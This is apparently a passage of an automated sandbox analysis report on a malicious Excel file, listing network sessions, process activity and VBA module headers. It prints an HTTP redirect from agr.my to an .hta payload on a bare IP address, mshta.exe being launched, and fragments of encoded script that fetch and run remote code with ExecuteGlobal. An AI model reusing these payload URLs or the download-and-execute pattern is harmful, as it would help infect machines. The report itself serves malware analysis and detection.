                                          Mar 26, 2025 08:12:40.350804090 CET1038INData Raw: 32 30 25 32 35 66 75 67 75 65 73 25 32 35 25 32 32 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 67 72 65 63 6f 2e 57 72 69 74 65 4c 69 6e 65 25 32 30 25 32 32 65 63 68 6f 25 32 30 49 66 25 32 30 64 6f 63 75 6d
                                          Data Ascii: 20%25fugues%25%22%0A%20%20%20%20%20%20%20%20greco.WriteLine%20%22echo%20If%20documentarist.Status%20%3D%20200%20Then%20%3E%3E%20%25fugues%25%22%0A%20%20%20%20%20%20%20%20greco.WriteLine%20%22echo%20%20%20%20%20ExecuteGlobal%20documentarist.res


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.749697147.79.86.934437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:12:39 UTC199OUTGET /mSGalN?&morning HTTP/1.1
                                          Accept: */*
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                          Host: agr.my
                                          Connection: Keep-Alive
                                          2025-03-26 07:12:40 UTC469INHTTP/1.1 302 Found
                                          Content-Length: 109
                                          Content-Type: text/plain; charset=utf-8
                                          Date: Wed, 26 Mar 2025 07:12:40 GMT
                                          Location: http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe
                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                          Vary: Accept
                                          X-Content-Type-Options: nosniff
                                          X-Dns-Prefetch-Control: off
                                          X-Download-Options: noopen
                                          X-Frame-Options: SAMEORIGIN
                                          X-Xss-Protection: 1; mode=block
                                          Connection: close
                                          2025-03-26 07:12:40 UTC109INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 30 39 2e 34 36 2e 31 32 34 2e 31 30 32 2f 78 61 6d 70 70 2f 6e 69 63 65 68 6f 6d 65 2f 67 6f 6f 64 67 69 72 6c 77 69 74 68 62 65 73 74 62 61 74 74 69 6e 67 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 2e 68 74 61 3f 26 62 61 67 70 69 70 65
                                          Data Ascii: Found. Redirecting to http://209.46.124.102/xampp/nicehome/goodgirlwithbestbattingwithgoodthings.hta?&bagpipe


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.74970013.107.246.384437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:12:53 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-26 07:12:53 UTC493INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:12:53 GMT
                                          Content-Type: text/plain
                                          Content-Length: 1114783
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public
                                          Last-Modified: Mon, 24 Mar 2025 13:40:54 GMT
                                          ETag: "0x8DD6AD97FEF19EF"
                                          x-ms-request-id: ebdb26f1-701e-000d-2b05-9e6de3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250326T071253Z-17cccd5449bzd7mthC1EWRrdxw0000000fwg00000000a1xx
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-26 07:12:53 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                          Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                          2025-03-26 07:12:53 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                                          Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                                          2025-03-26 07:12:53 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                                          Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                          2025-03-26 07:12:53 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                          Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                          2025-03-26 07:12:53 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                          Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                          2025-03-26 07:12:53 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                                          Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                          2025-03-26 07:12:53 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                                          Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                          2025-03-26 07:12:54 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                          Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                          2025-03-26 07:12:54 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                                          Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                          2025-03-26 07:12:54 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                          Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.74970113.107.246.384437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:13:00 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-26 07:13:00 UTC515INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:13:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 2128
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                          ETag: "0x8DC582BA41F3C62"
                                          x-ms-request-id: 0fe88ecf-101e-007a-32da-9b047e000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250326T071300Z-17cccd5449bkk7bshC1EWR4rww0000000g10000000004trc
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-26 07:13:00 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.74970213.107.246.384437144C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          TimestampBytes transferredDirectionData
                                          2025-03-26 07:13:00 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                          Host: otelrules.svc.static.microsoft
                                          2025-03-26 07:13:00 UTC470INHTTP/1.1 200 OK
                                          Date: Wed, 26 Mar 2025 07:13:00 GMT
                                          Content-Type: text/xml
                                          Content-Length: 204
                                          Connection: close
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                          ETag: "0x8DC582BB6C8527A"
                                          x-ms-request-id: fe09a350-901e-0048-3adf-9cb800000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20250326T071300Z-17cccd5449bg7c4bhC1EWR84740000000fz0000000006k8z
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2025-03-26 07:13:00 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                                          Statistics

                                          CPU Usage

                                          050100s020406080100

                                          Click to jump to process

                                          Memory Usage

                                          050100s0.0050100150200250MB

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          • File
                                          • Registry

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:03:11:43
                                          Start date:26/03/2025
                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                          Imagebase:0xdc0000
                                          File size:53'161'064 bytes
                                          MD5 hash:4A871771235598812032C822E6F68F19
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false
                                          Show Windows behavior

                                          File Activities

                                          Show Windows behavior

                                          Section Activities

                                          Show Windows behavior

                                          Registry Activities

                                          Show Windows behavior

                                          COM Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Process Activities

                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          Show Windows behavior

                                          System Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Windows UI Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          General

                                          Target ID:10
                                          Start time:03:12:39
                                          Start date:26/03/2025
                                          Path:C:\Windows\SysWOW64\mshta.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                                          Imagebase:0x6b0000
                                          File size:13'312 bytes
                                          MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Section Activities

                                          Show Windows behavior

                                          Registry Activities

                                          Show Windows behavior

                                          COM Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Windows UI Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          General

                                          Target ID:12
                                          Start time:03:12:46
                                          Start date:26/03/2025
                                          Path:C:\Windows\splwow64.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\splwow64.exe 12288
                                          Imagebase:0x7ff7e5b60000
                                          File size:163'840 bytes
                                          MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Section Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Process Activities

                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          General

                                          Target ID:14
                                          Start time:03:13:01
                                          Start date:26/03/2025
                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ORDER 517-2025.xla.xlsx"
                                          Imagebase:0xdc0000
                                          File size:53'161'064 bytes
                                          MD5 hash:4A871771235598812032C822E6F68F19
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true
                                          Show Windows behavior

                                          File Activities

                                          Show Windows behavior

                                          Section Activities

                                          Show Windows behavior

                                          Registry Activities

                                          Show Windows behavior

                                          COM Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Process Activities

                                          Show Windows behavior

                                          Thread Activities

                                          Show Windows behavior

                                          Memory Activities

                                          Show Windows behavior

                                          System Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          Show Windows behavior

                                          Windows UI Activities

                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                          Disassembly

                                          Code Analysis

                                          Call Graph

                                          Hide Legend
                                          • Entrypoint
                                          • Decryption Function
                                          • Executed
                                          • Not Executed
                                          • Show Help
                                          callgraph 1 Error: Graph is empty

                                          Module: Sheet1

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Sheet1"

                                          2

                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

                                          Attribute VB_TemplateDerived = False

                                          8

                                          Attribute VB_Customizable = True

                                          Module: Sheet2

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Sheet2"

                                          2

                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                          3

                                          Attribute VB_GlobalNameSpace = False

                                          4

                                          Attribute VB_Creatable = False

                                          5

                                          Attribute VB_PredeclaredId = True

                                          6

                                          Attribute VB_Exposed = True

                                          7

